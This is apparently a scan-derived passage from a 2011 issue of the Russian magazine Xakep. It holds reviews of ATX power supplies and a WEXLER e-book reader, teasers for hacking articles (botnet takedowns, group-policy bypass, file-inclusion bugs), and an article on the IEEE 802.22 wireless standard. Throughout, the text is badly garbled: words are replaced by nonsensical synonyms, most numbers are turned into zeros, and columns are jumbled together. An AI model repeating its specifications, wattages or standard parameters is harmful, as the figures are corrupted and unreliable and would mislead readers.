CorsairProfessional
Series Gold АХ750

MODU87+ SOOW

Мощность :

000 Вт

Заявленный КПД:
Количестволиний +12V

н еменее90%

050Вт
неменее90 %

единая абрис

единая шеренга

0

Максимальная комбинированная мощность

+3,3V-22A, +5V-25A,+12V-56 д,
-12V-0,3A, +5Vsb-3,5A
+3,3V & +5V-150 Вт, +12V-672 Вт

+3,3V -25д, +5V-25A, +12V-62A,
-12V-0,5A, +5Vsb-3A
+3,3V & +5V -125 Вт, +12V -744 Вт

+3,3V -24д, +5V -24А, +12V1-V4-30A,
-12V -0,5д, +5Vsb-3A
+3,3V & +5V -120 Вт, + 02V1 ..

ТилРFС
Охлаждение
Габариты
Вес

живой
отдушник 020 мм
0 00х 050х86мм
0,3 кг

предприимчивый
кулер 020 мм
060х150х86мм
0,3 кг

инициативный

Максимальные энергетика no линиям

000 Вт
до93 %

&+12V4-792Вт

018

вентотсос

040 мм

075х150х86мм

0,9кг

ХАКЕР

00 / 053/2 011

Питайтесь правильно!

FSPAURUM GOLD700
азница в ряду AURUM GOLD 000 равно предыдущей моделью FSP изо
н а ши х т естов минимальна равно заключае тся на мо щн ости, чи от ле

разъемов на подключения усик тройств , н у да во цене , разумеется.
В остальном они братья-близнецы почто в соответствии с во н е шн ему виду, зачем сообразно разме-

рам !две самые компактные модели во нашем тесте!, зачем до содержимому
золо тисто-черной упаковки . AURUM GOLD 000 - установка питания бивак дартно­
готипасво з можностьюподключенияпарывидеокартспитаниемподвум

разъемам 0+2 рiп, семи устройс тв вместе с коннектором SATA равно четверик х со Molex,
об дного FDD . Заявленная мощь БП -700 Вт, флюиды за линиям +12Vте

же, что-нибудь да у младшей модели, -1 0А, зато до линиям +З,ЗV да +5Vони раньше да
давно не без; тигают 08А. За ох л ажде ни е отвечает 020 мм отдушник держи гидродина­
мическом подшипнике . Тес твоя милость AURUM GO LD 000 прош ел уверенно, показав
чутьлуч ш ие результаты , чем его вениамин собрат. Отклонения н е
паче 0 % -все во предела х нормы. То а не без; амое не запрещается произносить равно п ро нагрев :
те плый кор п усишко БП присутствие максимал ь утнапиштим нагрузке-зто хо рошо. Д ругое рукоделие ,
экой ценой сие дается : отдушник что ни говори ш лоб широк новат.

THERMALTAKE
TOUGHPOWERGRAND750W
heгmlatak e Toughp owe гGгaпd 050Wупакова н во неблестящий черноволосый
обшивка вместе с алой каймой, проходящей согласно периметрублока,- скром так

равным образом изысканно . По габ аритам зто самый больший БП с наши х испытуемых-аж 080 мм длины! Комплектация yToughpoweгGгand 050W, nожалуй,
самая бога тая : бархатная сумочка, во которой н аходи тся самостоятельно БП; ме ш очек

чуточку поменьше-для аксессуаров; ридикюль в липучке -дл аз многогрешный пр овода в; кабе­
ли, стяжки-лиnучки во достат ке, nластиковые зажимы во количестве 0 стукко ,

инструкция, винтики, а тоже резиновые накладки получи и распишись ради днюю стенку БП .

...

ToughpoweгGгand 050W -м одель со модульным nодключением. Заявлен ­
ная мощность-750 Вт, теор е тич еский п ик в соответствии с е д равно н ой линии+ 02V-720 Вт.
Остужает Б П 040-миллиметровый вентотсос бери дв ух шариковых подшиn­
никах да со крохотку измене нн ой формой лопастей, вследствие чемуоб е щано
снижениеуровня шума . П об итогам тестов выяснил ось, который клятва бы л касательно
выnолнено: работаетТоughроwег Gгand 050Wти ше воды, подальше тра вы,
оставаясь с грехом пополам теnлым. Пеказател равным образом - отличные, отклонения далеко не побольше 0% на
люб ом изо режимов, а nолинии +5V -так равно ни получи лепту идеальные.

FSPAURUM
GOLD600

Thermaltake
Toughpower
Grand750W

FSPAURUM
GOLD700

ЛУЧШИЕ ИЗ РАВНЫХ
По совоку пн ости параметров лучшая форма - сие ENERMA X
MODU87+ BOOW. В его п ользу чу бесподобный кусок пл ек т nо­
ставки, великий вслед за жете из п что до мощности, россы п ь разъемовдля

000 Вт
00%

000 Вт
00%

до92 %

0

0

единаялиния

+3,3V-24A.+5V-24A.+12V1-V4-18A.
-12V-0,5A.+5Vsb-3,5A
+З,ЗV & +5V -140 Вт, +12V1
& +12V4- 040 Вт

+3,3V-28A.+5V-28A.+12V1-V4-18A.
-12V-0,5A.+5Vsb-3,5A
+З,ЗV & +5V -160 Вт, +12V1 ..

+3,3V-25A.+5V-25A.+12V-60A.

инициативный

виндзейль 020 мм
0 00х 0 00х86мм
0 ,9к г

&+12V4-672Вт
динамичный
отдушник 020 мм
050х 040х86мм
0,9кг

050 Вт

-12V-0,8A.+5Vsb-ЗA
+З,ЗV & +5V -150 Вт,
+12V-720Вт
жаркий
отдушник 040 мм
0 00х 0 00х86мм
0,5кг

подключения, великолепные результаты испытаний равно ти ха автор
служба . Пр авда, вместе с таитон в духе простой конторский П К, ей-ей да кор­

п уса потребует немаленького , хотя после этого ужак ничто невыгодный поделать.
Такие модели - доля энтузиас т ов, у которых равно от деньгами, равным образом
едарогими корпусами во се во порядке . Если а смета малограмотный п о­

зво ляетбольши хт рат, только принимать надобность во качественном БП
со серт ификатом ВО

PLUS Gold, так стоитобратить вним а ни е сверху
FSP FSPAURUM GO LD 000. Модульно вместе с ти н ет, из-за т в рассуждении кушать честные

000В~выполнениевсехзаданных н ормативовпонапряже н и­
ям, килоом п актные размеры да жуть приятная цена.

ХАКЕР

00 /153/2011

I

019

FERRUM

Александрушка Ми хе ев

С каждым годом величина карманных да никак не нимало устройств, способных
рассеять человека на дороге, растет напрямую в глазах. А однако во дни оны со с лица

брали да не сделаете аюшки? обычную бумажную книгу иначе говоря только « тетрис » ей-ей кас­
сетный плеер . Теперь квалификация шагнула следом : во поездке ваша сестра можете располагать
почти рукой уж на что тысячу книг, сколько-нибудь сотен часов музыки , FМ-радио, какие­

Wt!XLI?:r

02:00
. . aall
~
~

ш

n

""11111

M }""IWJI

0:.0)

а

нибудь незамысловатые зрелище равным образом ряд кинофильмов- равным образом всё сие во одном
устройстве. Все вышеперечисленные внутренние резервы относятся равным образом ко новинке

WEXLER.BOOK Т5002,

насчёт которой сегодняшний день равно пойдет разговор.

« САПЕР »

Инженерам с

ВОЛШЕБСТВО В КАРМАНЕ
WEXLER разудало сь воплотить в себе на жиз нь

Управл е ни е книгой не задавайся некуд а : << ра ибо ковер стол>>

AII ,]CQ

!t•no+o•

беда интересную задумку - универсальный <<ком­

предоставляет д осту п разом ко безвыездно м возможным

~

во

байн>> равным образом приземленно д аром . Н об об по всем статьям за п оря д­

функциям , п озтому лишиться что такое? -то на глубинах

ll pu80..11111 01

P 0;JII11

II IC!jiO/iiL"II

ку. Так называемая электронная атлас на вывеску вы­

карта не за плечу . Еще паче комфортным

g

rn
... ,,.J•rto

r;,,o•oto•

liliШI

(}J

..,.,. .

l.:a.1~.otY

0nop

глядит наравне да многие ее собра тья . Корпу вместе с от д ела н изо

исчерпывание WEXLER.BOOK Т500 0 конъюнктура ет

пл астика, н а нем расположены общей сложности три ко н что касается пки .

акселерометр , позволяющий безотчетно

Ди со пл ей

п ереворачи на а тьи зображе ниевн полоз н уюс тор что касается н ~

WEXLER.BOOKT5002 неграмотный лишь только цветной,

однако равным образом се н со рный . Налицо большое достижения

Сенсорный ди от плей конец отзывчивый, однако

пер е д << чит а лками >> в ос нове e-i пk : умереть и безграмотный встать змож же ст ь

куда-нибудь удобнееу пр авлять побег тройством не без; через

со мотреть фотографии да ага а наружность ео на важнецки м

иду щ е го на комплекте со т илуса , нежели пальц ами.

качес тв е. Однако очерк ывае тся ценность уст р ойства :

Интерфейсов всего два:

изоб ра жение н еско ль ко << ш рассудок нов а в таком случае >>. Окупается

наушников .

mini-USB равно

вам ходдл автор

зто большим в количестве поддерживаемы х форматов
тельного конвертирова ния. Также ко мулыимедий­

ВЫВОДЫ
WEXLER .BOOK Т 0002 изо разряда устройств,

ным возможностям относится существование FМ-радио

точную nринадлежн ос ть которы х ко тому или — или иному

видео, которые не возбраняется вглядываться безо предвари­

Экран : 0дюймов, 000 х 080точек,
се нсорный , цветной, LЕD-подсветка

Встроенная память: 0 Г б
Карты памяти: впредь до 02 Г б microSD
Форматы текста: Т ХТ, РОВ , HTML,

PDF, FB 0, EPUB

ипле е ра.Последнийподдерживаетнетолько

классу найти трудно. Ведь сие да << читальня >>, равно

ши роко равным образом вместе с п ользуемый объем МРЗ, да равным образом инда

аудио-, равным образом видеоnлеер . Не считая, конечно, дру ги х

FLAC да АСС. Конеч н о, музыки

равно видео было бы тес­

полезныхфункций.Длягордогозвания • п об лны й

новат по части получай во от тро енной п амя ти

04 Г бl, же ее не возбраняется

начинка >> безвыгодный х ватаеттолько WiFi - модуля равно открывал ­

прибавить следовать со ч ет карт иллюминаторы micгoSD .

ки для того число «пи» ва . Стоит отметить, ч ведь даже если главно е интересах
вас-литература, а ос т а льные ф у нкции нужны

КНИГА С АКСЕЛЕРОМЕТРОМ

несравнимо р еже, т относительно л учше б война электронную книгу

Е со ть да больше вслед метны е, хотя на сё равн в отношении п по отношению л езные во

в ос н ове

п овсед н е вн ой жизни фуй н кции. К ним пишущий сии строки через н ежели

зеницы будутуставать намно г об б ы стрее. Но йес ли ваша сестра

e- in k, в такой мере по образу ото чтения не без;

LСD-дисnлея

Форматы музыки: МРЗ, WMA, FLAC, ААС
Форматы иэображений:JРЕ G, ВМР, GIF
Форматы видео :WМV, RM, AVI, RMVB,
ЗG Р, FLV, МР4, DAT, VOB, MPG, MPEG,

ди ко т офон, котишка орый н ет-н ет ага равно подле впору

ищете собственно один воздаяние нны й мулыимедийный

однажды. Блокнот дл автор этих строк различны х заметок,

<<комба йн >> до демократичной цене , т насчёт

MKV, MOV

кален дарь- еже дн евник, секун д омер и, наконец,

ВООКТ5002подойдеткакнельзялучше .

Интерфейсы : USB 0.0, audio-out
Дополнительно: FМ-ради о, диктофон,

WE XLER .

калькулятор. В со л учае, yes ли книги равным образом фильмы

плюсы

акселерометр

зако нч атся раньше, ч ем очере д ь, на которой вы

Габариты :1 08х90х11 мм

неграмотный п ос ч летчик тливило сь из т оять, так бери подмога придут

Ни зкая це возьми .

незамысловатые встроенные проказа . Одна с

Цв етн ой се н неочищенный ди от пл ей.

ни х - з в килоом ы й во всем

В ос пр оизве мол ни е видео множества форматов .

Вес : 085 г
Комплектация : стилус,
кабельmiпi-USВ> USB, директива

020

ХАКЕР

00/153/2011

Preview

01

сторона журнала получи одной полосе.

Тизер н ескольких стате й с сие го заезжий дом .

хакинг

КАК ЗАКРЫВАЮТ БОТНЕТЫ
Есть ли у одной, нехай пусть даже беда

большой, !Т-компании хоть бы единолично счастливый случай
вместе с п рави т ься со задачей, ко торую отнюдь не мо г ут
постановить правоохранительные органы равным образом

спецслужбы разныхстран мира? Ботнеты

Waledac, Rustock, CoгeFiood равным образом следом
продолжали бы рассылатьмиллио н ы

спам-сообщений иддосить ресурсы,
разве бы их деятельности далеко не помешали

сотрудники

Microsoft. Интересно, чтодля

зтогоиспользовалисьнетолькочис т по части

технические способы, так равным образом юридические уловки , в рассуждении которых никак не могли уметь

киберпреступники . Какудалосьполучить
вход для управлению целыми ботнетами
равным образом обезв!J.едить состояние зараженных
машин, да мы от тобой на подробностях рассказали на
зто м материале .

PCZONE

З D-СКАНЕРЗА$30
Кто бы был способным подумать, что-нибудь сожительство лазер­
утнапиштим указки ивеб-камеры может помочь

создать3D-модельлюбого объекта?
Пробуем беспритязательный концепт во дей вместе с твии .

MALWARE


ХАКЕР

взламывание

ОБХОД ГРУППОВЫ Х П ОЛ ИТ И К

Архитектурныепромашки возле разработке
Wiпdоwsоставили немалолазеекдля
обхода групповых политик. 0 работающих
способов- во зто м материале.

Рядовымиуязвимастями ко л асса local/
гemote file iпclude скудно кого удивишь. Но да мы вместе с тобой
да невыгодный будем издавать баян, имея нате руках
небольшую толику полностью новых тем .

UNIXOID

СЦЕНА

БАБЛОНАМАЛ ВАРИ

НОВАЯРУБРИКА--ИНТЕРВЬЮ

Как равно сколько стоит зарабатываютнаши

Водан выпуск-один -видный засранец изо

криминальные колеги? Впечатляю щ ие

!Т-тусовки. В данный разок наша сестра заехали во

откровенияучастникачерного рынка что до

равным образом взяли беседа у главного вирусного

том, во вкусе было равным образом который стало.

аналитика-Александра Матросова.

00 / 053/ 0011

ТЫСЯЧА И ОДИН ИНКЛЮД

ESET

01

ANDROID: ТОТАЛЬНОЕ ПОДЧИНЕНИЕ
Рутинг, рекавери, мод, сайаноген ...
Огромное ко л ичество различных ха ков,
манера во равно альтернативных прошивок-

во зто м большом

MegaFAQ"e.

021

0
0

0

ite

асе

НОВЫЙ СТАНДАРТ
БЕСПРОВОДНОЙСВЯЗИ
Зачем нужны новые стандарты
беспроводный связи, нет-нет да и сделано
питаться Wi

Fi, WiMAX да

LТЕ?Хотя бы

IEEE802.22
Официальныйсайт

002.22: www.ieee802
шт.

чтобы того, воеже защитить зону
покрытия радиусом поперед

000 км

0011 г. Международный учреждение инженеров объединение электро т ех­

нике равным образом электронике llnstitute of Electrical and Electronics Engineers]
объявил касательно завершении работ надо стандартом бесnроводной взаимоотношения IEEE

002 .22,

известным лещадь именем "white space " l « npoбeл»]. Название далеко не

по стечению обстоятельств : в целях nередачи данных предполагается исnользовать << nро­

равно

передачу данных накануне 02 Мбит/с.

В июле

белы» во телевизионном ОВЧ/УВЧ-диапазоне
Статья основана получай
открытых рабочих
документах IEEE
002.22 WG равным образом обзор­
утнапиштим публикации
CaгlosCoгdeiгo,

054-862 М Гц] частот. Этот

подступ стал возможен из-за контокоррент изобретения <<умного>> радио-техно­
логиикогнитивнойрадиоnередачи,котораяобеспечиваетподстройку
nараметров приемопередающих устройств сети, где-то в надежде пересылка
данных отнюдь не вылезала бери « лицензионные» частоты . Как сие nроисходит?

КiгanChallapali

Система неослабно анализируетсnектр радиосигнала, окружающие

and Dagnachew

фоновыесигналы,атакжеповедениепользователейсети.Базовая

Biггu " IEEE802 .22:

Ап lntгoduction to
the Fiгst Wiгeless
Standaгd based оп
Cognitive Radios".

станция, собрав всю информацию что до частотном диапазоне да исnользуя

информацию насчёт своем месторасположении ln o GPS], определяет, какие
частоты мо г ут взяться исnользованы ради установления маза вместе с пользова­
телямисети.Приуже побег тановленнойсвязисистема n ериодиче вместе с киска­
нирует частотный диапа з некто получи история появления новых сигналов равно быть
обнаружении таковых из разу а перестраивается сверху прочие частоты .

022

ХАКЕР

00 / 053/ 0011

002.22 : White Space

Разработчики отмечают, аюшки?

IEEE 002.22 WRAN является

одной изо пер­

Механизм совместногососуществования [coexistencel систем под­

вых спецификаций, использующих на полной мере когнитивные техно­

разумеваеторганизацию спектра, где-то ради норма безвыгодный вносил п о­

логии на радиосвязи. Таким образом , шаблон позволяет плодотворно

бурдюк на работу лицензионных nользователей, а в свой черед организовывал

пускать в дело имеющийся спектр рабочих частотбез необходимости

внутрисистемноеранжированиеабонентовврабочейnолосе.

получения лицензий. В результате зто позволяет дослужиться скорости

передачи данных до самого

02 М бит/с да зону покрытия вместе с радиусом впредь до 000 ко м!

АНТЕННЫ
Сеть предназначена какдля работы не без; nрофессиональными фиксиро­

ИСПОЛЬЗУЕМЫЕ ЧАСТОТЫ

ванными базовыми станциями, в такой мере да из портативными [либо фиксиро­

Новыйстандартбылспроектировандлябеспроводныхрегиональных

ванными! пользовательскимитерминалами [модемами! . Для охвата

сетей [Wiгeless RegionaiAгea Netwoгk, WRANI . Это предполагаетпо­

больших площадей необходимы соответствующие мощности сигналов.

крытиезон радиусом на десятки километров . Спецификация позволит

В спецификации nредполагается, чтодля nокрытия зоны вместе с радиусом на

провайдераминтерне~услугобеспечитьжителямсельскихрайонов

00 ко м

ход ко широкополосному доступу во Сеть там, идеже его покамест нет. Увеличе­

сих целей размещается ненаnравленная антенна, с тем ритмично

ние радиуса поведение удалосьдостичь по причине уменьшению рабочих

пекрытьсигналом всю площадь. При необходимости изотропную антенну

nотребуется сила излучения в4 Вт. На базовой станциидля

частот, как всегда используемых во Wi-Fi, WiMax не в таком случае — не то LТЕдля передачи ин­

позволяется занять место секторной. Такая взаиморасположение nозволитэффективнее

формации. Подбор оптимальных частот зависит ото многих факторов . Для

охватыватьзону вместе с неравномерным расnределением абонентов объединение площа­

обеспечения наибольшей дальности не без; сохранением разумной мощности

диилисосложнымразмещениемнесколькихбазовыхстанций.

равным образом приемлемой полосы пропусканиялучшим образом подошли частоты
диапазона от54до862 М Гц, где-то называемыетелевизионные частоты.

Насторонеклиентанаnротивприменяетсяузконаправленнаяантен­

насориентированиемвсторонубазовойстанции[илибазовойстанциис

Ширина полосы одноготелевизионного канала во США, Японии да большей

максимальным сигналом, если бы их несколько!. Кроме того, на клиентском

части Центральной да ЮжнойАмерики составляет6 М Гц, к России равно

оборудовании как не быть сканирующая [sensiпgl антеннадля функциони­

большинствадругихстран сия протяжение равна 0 М Гц , да встречаютсятак­

рованиякогнитивныхмеханизмов.Прииспользованиисnутникового

но стандарты не без; 0-м.егагерцовой полосой , на выдержку на Австралии, Бель г ии

nозиционирования да может составлять размещена GРS-антенна .

равно Люксембурге . Позтому в802 . 02 предполагается пустить в ход ширину
полосы одного канала на 0 [8,71 М Гц.
Существующая системателевещания можетслужить примерам

успешного использования этогодиапазона пользу кого покрытия больших

Важно nонимать крест стандарта

IEEE 002.22 через других специфика­

ций, на особенности через IEEE802.16 [WiMaxl, из которым его много раз сравнива­
ют. Основная различие на том, что802.22ориентирован возьми сельские мест­
ности да отдаленные регионы. Его радиус зоны покрытия во разы глоссалгия ш е .

площадей. Ктомужеданным частотам безграмотный страшны стены равным образом препятствия.

Кроме того,

Однако во использовании ОВЧ/УВЧ глотать равно недостаток: меньшие частоты

когнитивные технологии пользу кого совместного использования оптимального

002.22 является первым на мире стандартом, использующим

[длинные волны! нуждаются на сильнее габаритныхантенных системах.

частотногодиапазонаинетребуетоформлениялицензийнаисnользова­

Кромеповсеместно используемыхсистем аналоговоготелевидения

ниеоnределенныхчастот

NTSC [США, Канада, Япония!, PAL[Eвponal, SECAM [Франция, Гр еция,
Россияlдиапазонофициальнозакреплензарадиосвязьюгосударствен­

АРХИТЕКТУРАСТАНДАРТА

ных служб [полиции, противопожарной службы ит.д.l да коммерческих

Н аиболее важными требованиями со стороны разработчиков для стандарту

сервисов [такси равным образом т.д . l. В данной полосетакже работаютбеспроводные

IEEE802.22 были

микрофоны, системы цифровоготелевидения ATSC/DVB-T равно богзнаеткто

ванию nриходится подвизаться во сnектре елицензионными абонентами. В

еще-важно, который никому изо них воспрещено мешать!

итоге стандарт, оnисывающий РНУ-

Contгoll модели

ТЕХНОЛОГИЯ «УМНОГО» РАДИО

податливость равным образом адаnтивность системы, nосколькуоборудо­

[Physicall равным образом МАС-уровни [MediaAccess
051 сети, получил особую архитектуру.

Для того дай тебе компетентно равным образом невредно пускать в ход «nробелы » во уж

ФИЗИЧЕСКИЙУРОВЕНЬ

используемых частотах, предусмотрен цельный колонна когнитивных

Междубазовой станцией равно пользовательским оборудованием бери

механизмов .

физическом уровне организована двухсторонняя складность со временным

Сканирование [seпsiпgl рабочего спектра частот позволяетобна­

разделением

[Time Division Duplexiпg, TDDI. В т аком разделении

руживать занятые каналы. Эта операция nроходит во изневольщик н ом
nорядке nри инициализации козни . Также оповещение по отношению частотах

nериодическиобновляетсяnриработесистемы.Уnравление
сканированием осуществляется базовой станцией, которая безграмотный
всего-навсего nосылаетуnравляющие команды nользовательскому обо­

ИСТОРИЯ СТАНДАРТА

рудованию , однако равным образом самочки производит разведку спектра да отыскание новых

абонентов. Такая теория по мнению зволяет актуально сыграть на руку инфор­

мацию насчёт состоянии эфира закачаешься всей зоне покрытия базовой станции равно

Спецификация

своевременноконфигурировать сеть.

Джозефа Ми толы

Регистрация равно проверка nользовательского оборудования не­

ний во

обходимо в целях эффективной организации частотного пространства да

ная nрофессором

002 .22 nоявилась вследствие работам nрофессора
011, опубликовавшего результаты своих исследова­

0999 г. коллегиально сДжеральдом Магуайром. Конце nция , назван­
"cognitive гadio" [ << когнитивное радио>> !, nозволяет

быстрого подключения новыхабонентов ко сети.

системам блат исnользовать << занятые >> частоты пользу кого передачи своих

Единаябазаданныхлицензионныхnользователейдиаnазонаизна­

данных вслед расчёт имеющихся на n олосе <<nробелов». Однако принцип вслед за nр е­

чально предотвращаетработусети возьми постояннозанятых местными

щал заниматься со зарезервированными частотными диапазонами, либо

службами либо региональнымителевизионными каналами частотах.

вероятность nоявлялась nри nокуnке дорогостоящих лицензий. За­

Геолокация позволяетузнать край размещения равным образом по части базе данных

конодательная основа мешала nродвижению технологии. Лишь на

оnределить, какие каналы заняты на конкретной местности, а вот и все

Федеральное агентство соответственно своя рука [Fedeгal Commuпications

выбратьоптимальный трасса интересах nередачи nа кетов информации.

США внесло поnравки , дающие выполнимость нелицензированным

В рамках спецификации предnолагается nрименятьспутниковое alias

абонентам исnользоватьлицензионные полосы nри условии, который те

н аземное позиционирование. Для спутниковой геолокации у каждого

неграмотный вносят nомех на работу законных nользователей. Это инцидент ини­

абонента довольно расnоложено GРS-оборудование. Информация насчёт

циировало nоявление во ноябре

местоположении передается получай базовую станцию объединение протоколуNМЕА

которая стала править разработку стандарта

0183. Этотекстовый nротокол взаимоотношения морских навигационных систем,
повсеместно применяющийся на GPS.

радиосвязью во качестве базовой технологии . Окончательный релиз

ХАКЕР

00 / 053/2011

IEEE 002 .22-2011

0004 г.

0004 г.
Commissionl

на << стенах»

IEEE рабочей груnnы,
002 .22 от когнитивной

nоявился всего лишь сnустя семь лет.

023

PCZONE

ХАКЕР

00/153/201 0

002.22: White Space

входные равным образом выходные сведения передаются возьми одной частоте, да на отличаются как небо и земля

промежутки времени. Если нужно переменить первенство согласно скорости,

архитектуру, воеже мгновенно откликаться сверху изменения на сети.
Для обмена данными на

002 .22

используются суперфреймы

в таком случае кто в отсутствии нисколько попроще -достаточно продолжить выделенное срок с целью

(supeгfгame). Длительность одного суперфрейма составляет

одного потока данных равно устранить пользу кого другого.

В начале каждого суперфрейма расположена специальная пре ам­

Кактранспортный аппарат на 002.22 используетсятехнология муль­
типлексирования не без; ортагональны м частотно-временны м разделением

каналов (Oгthogoпal Fгequency Di visioп

Multiplexing, OFDMI. Аналогичная

060 м с.

була (ргеаmЫе) да ревизорский заглавие суперфрейма (supeгfгame
contгol headeг, далее- SCH). По на нос изо доступных равным образом отвечающих
во всем требованиям каналов базовая пролет посылает суперфреймы.

чертеж применяется на WiMax. Суть ее заключается во том, аюшки? один по­

Абоненты, находящиеся на зоне поведение станции да е ще безграмотный подклю­

токданных разделяется междунесколькими специальными частотами.

ченные ко сети, <<слу ш ают» свободные каналы для наличность суперф­

реймов . Получив данные, абонентское обеспечение извлекает с

Каждый подпоток модулируется по мнению своей схеме .
В спецификации предусмотренотри вида схем модуляции: ква­

дратурная фазовая обработка (Quadгatuгe

SCH

всю необходимую информациюдля инициализации сетевого

соединения . Каждый суперфрейм состоит с фреймов (fгame). Дли­

Phase Shift Кеу, QPSКI,
квадратурная амплитудная обработка грубо 06 да 04 (Quadгatuгe
Amplitude Modulatioп, 06 QAM равным образом 04QAMI . Схемы отличаются междусо­

тельность одного фрейма составляет 0О м с, соразмерно во одном

сеча числом информации, которую допускается дать одним симво­

переносчиками данных.

верзила . Та или — или иная карта модуляции выбирается исходя с условий пере­

суперфрейме

06 фреймов. Фреймы являются

Инициализация волокуша на

непосредственными

002.22 сложнее, нежели

на других беспроводных

дачи. Чем за пределами проворство передачи, тем дальше ее исправность (тем за пределами

сетях.Всiусложняетсятем,чтонетизначальноопределенногоканала

объективная возможность возникновения ошибки!. По этому коли абонентсети ра с­

связи. Таким образом, пользовательскому оборудованию поначалу

положен вдали через базовой убежище ции да высота сигнала кайфовый сезон взаимоотношения

необходимопросканироватьсеткучастотисоставитькартувсего

малограмотный аспидски высок, в таком случае полегче заменить схему модуляции, на выдержку от

диапазона. Затем во свободных равно п одходящих пробелах отыскивать

получи и распишись больше медленную, да зато стабильную

QPSK. Система

06 QAM

неутомимо

базовой станции. После того на правах

SCH хорош получен,

SCH

модем абонен-

адаптируется, равным образом в целях каждого пользователя проводится симметрирование

та дает об себя пробовать базовой станции равно остается во канале бери момент

оптимального режима посередь скоростью равным образом помехоустойчивостью.

поведение суперфрейма. Если из-за сие момент модем получает ответ, в таком случае

Важным с целью стандарта является особенностьОFDМ давать отпор

происходит инициирование равным образом отвод ко сети. После установле­

многолучевому распространению. Данный результат возникает быть на­

ния соединения оповещение об состоянии каналов отправляется бери

личии каких-либо препятствий междубазовой станцией да абонентом .

базовую станцию.

Сигнал может постигнуть числа отражений ото разнообразных объектов.

Как говорилось выше, кайфовый пора работы во козни базовая перегон

Вконечномсчетекприемномуустройствуприходитнеодинсигна~а

повременно посылает команды абонентскому оборудованию пользу кого

порядочно снекоторой задержкой, сколько можетпривести для межсимвольной

запуска сканирования диапазона возьми существование лицензионных пользо­

интерферен ции . Против зто го во

вателей. П ри этом существуют разные алгоритмы сканирования,

OFDM применяютспециальную вставку,

которые об пр еделяют п ороговый точка си гнала во канале, времена

такназываемыйциклическийпрефикс.
Для сильнее стабильной работы во

002.22 пр едусмотрено исполь­

сканирования, диапаэ он,вероятностьобнаружениялож нойтрево ги.

зование кодов, позволяющих вносить поправки ошибки. В томище числе

Существуют определенные пороговые значения сигналов, возле кото­

коды Галлагера (Gallageг), которые получай текущий час представляют

рыхонибудутинтерпретироватьсякаклицензионныепольэователи .

лучшее намерение в целях п ередачи информации в области каналу крыша не без; шумами

Всеэтипараметрывлияютнауспешностьполучениядостоверной

во ограниченной полосе .

частотной сетки во регионе . Базовая перегон может раздавать на­

Дляорганизациидоступакканалусвязинесколькихабонентов
синхронно применяетсятехника частотно-временногоразделения

грузку среди абонентами около сканировании частотного спектра.
Если основная базовая пункт продолжительно <<молчит>>, ведь тут абонент­

(Oгthogoпal Fгequeпcy Divisioп MultipleAccess, OFDMA). Этоуникальная

ское обеспечение ищет маяки через прочий соседней станции равно во случае

технология, позволяющая использоватьдоступное частотное простран­

успешного поиска п одключается ко ней . Моделирование бредень показа­

ство максимально выгодным способом . OFDMAyжe с удовольствием себя за­

ла, ась? даже если близ большом скоплении близко расположенных станций

рекомендовала во таких стандартах, равно как WiMax равным образом

терминалы абонентов борзо распределяются в кругу ними . В резуль­

LTE. В механизме OFDM

доступные специальные частоты делятся средь пользователями сети.

татенагрузканабазовыестанциистановитсяоптимальной.

Спектральная эффек тивно сть за стандарту может варьировать-

ся ото 0,624 прежде

0,12 Бит/с/Гц . Эта значение характеризует натиск

передачи данных на заданной полосе частот. Чем превыше значение,

тем большей пропускной способностью обладает система, впрочем из
ростом спектральной эффективности уменьшается помехозащищен­

ГЛАВНОЕ О СТАНДАРТЕ

ность. Для компенсации низкой пропускной талантливость канала близ
минимальной спектральной эффективности используется методика

канального объединения !сhаппеl boпdiпg) . Суть методики заключа ­

Назначение: широкополосный беспроволочный посещение для интернету

етсявиспользованиидотрехтелевизионныхканаловодновременн~

в целях сельской местности .

с намерением ради счисление ширины полосы на

Ядро: методика когнитивной радиопередачи, предназначеннаядля

08 (21, 04) М Гц покрыть приемлемую

безлицензионногоиспользования частоттелевизионного диапа зона.

скоростьпередач и.

Для защиты лицензионных каналов надо устоять

Портативность: дозволено воспользоваться на движении бери скорости перед

частотный интервал, с намерением изъять формирование п омех. Ширин у

014 км/ч.

частотного интервала рекомендуют создавать сопоставимой из ш ири утнапиштим

Топология сети: многоточечная (Poiпt-to-Multipoiпt).

од н ого канала. Фактически никуда не денешься кто наделен на ОВЧ/УВЧ-диапазоне

Радиусзоны покрытия:

пробелы шириной оттрех каналов (один оповестительный плю сдва

станции равным образом модема).

00-100 для м (для фиксированной базовой

защитных по мнению бокам) равным образом более. Это иск до сей времени крат подчеркивает,

Мощность излучения: 0 Вт (под мощностью излучения понима ется

ась? рационально разворачивать

эффективная изотроп а излучаемая мощность,

IE EE 002.22 на

сельской равным образом малонасе­

ленной местности, идеже поднебесье по поводу властен .

EIRP).

Антенны : получай базовой станции используется ненаправленная (либо
секторная) приемопередающая антенна, а для стороне абонента

МАС-УРОВЕНЬ
Уровень управления доступом для среде

направленнаяантенн~помимоэтог~естьненаправленнаяантенна

(Media Access Сопtгоl) оранье га­

длясканированиячастотногодиапазона(когнитивнаярадиосвяз~ .

низует адресацию равным образом проверка доступа для сети. МАС, основанный возьми

Геопозиционирование: GPS иначе наземное (необходимо для того функ­

когнитивных технологиях, повинен владеть беда динамичную да гибкую

ционирования системы!.

ХАКЕР

00/153/2011

025

PCZONE

Опи сание

Wi- Fi предназначен

для того замены

Технология сотовой

Технология широкопо-

Техноло г ия является

проводных л окальных сетей. По-

связи, которую относят

лосной отношения ; которую кончать

развитием линейки

ся беспроводный

сле дн ие ста нд арты в области скорости

для поколению

носят для сетям

CDMA-UMST -стандартов.

технологией, которая

ни в какой степени н е усту п ают кабельным

расшифровывается как бы

является динамично раз-

П оследовател ьность во

предназна ч е н а чтобы

анало оранье . В семействе

Univeгsa l MoЬi l e

вивающейся закачаешься во всем мире

развитии nозво л яет тех-

организации ш ироко-

техноло г ией . Аббревиатура

нологии несложно ада пт иро-

П ОЛОС Н ОГО достуnа К

002.11

больше двух десятков спе ц ифика-

0G. UM TS

Telecom munication System.

0.9G. WiMax

002.22 являет-

Wi-Fi расшифровывается наравне
Wi гeless Fidelity ! « Беспроводная

расшифровывается что

ваться получай существующих

интернету во ма л что до зарабатывать

Woгldwide lnteгopeгaЬi li ty

UМТS - сетях.

относят

селенной местности

точ н ость» ! .

fог Micгowave

для сетям

да сельских районах .

дей ствие про микроволно-

0. 0G-поколения.
LТЕ - Long Time
Evolution I «Долговремен-

умереть и никак не встать го достуnа>>!.

ное развитие>>!.

взрослые п л ощади со

ц ий.

Access

!«Международное взаимо-

LТ Е

Базовые станции
способны выстилать
использованием ког-

нитивных технологий.

Применение

Сейчас Wi-Fi-устройства встроены

UMTS является

